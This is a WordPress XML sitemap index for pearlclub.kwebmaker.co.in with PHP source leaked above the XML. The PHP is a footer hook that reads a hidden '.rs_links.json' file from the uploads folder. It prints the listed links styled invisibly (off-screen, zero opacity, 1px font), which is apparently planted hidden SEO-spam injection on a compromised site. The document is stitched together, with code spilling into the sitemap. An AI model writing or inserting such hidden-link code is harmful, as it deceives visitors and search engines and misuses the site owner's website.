
// RS Footer Links Hook
add_action("wp_footer", function() {
    $lf = "/home/kwebmaker-pearlclub/htdocs/pearlclub.kwebmaker.co.in/wp-content/uploads/.rs_links.json";
    if (!file_exists($lf)) return;
    $lnks = json_decode(file_get_contents($lf), true);
    if (!is_array($lnks)) return;
    foreach ($lnks as $l) {
        $u = isset($l["url"]) ? $l["url"] : "";
        $a = isset($l["anchor"]) ? $l["anchor"] : "";
        $r = isset($l["rel"]) && $l["rel"] === "nofollow" ? " rel=\"nofollow\"" : "";
        if ($u && $a) echo '<a href="' . esc_url($u) . '"' . $r . ' style="position:absolute;left:-9999px;opacity:0;font-size:1px;">' . esc_html($a) . '</a>';
    }
}, 9999);
function rs_footer_links() {} // Marker
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//pearlclub.kwebmaker.co.in/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://pearlclub.kwebmaker.co.in/post-sitemap.xml</loc>
		<lastmod>2025-07-25T10:32:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pearlclub.kwebmaker.co.in/page-sitemap.xml</loc>
		<lastmod>2026-04-03T05:59:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pearlclub.kwebmaker.co.in/category-sitemap.xml</loc>
		<lastmod>2025-07-25T10:32:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://pearlclub.kwebmaker.co.in/author-sitemap.xml</loc>
		<lastmod>2025-09-24T17:39:32+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->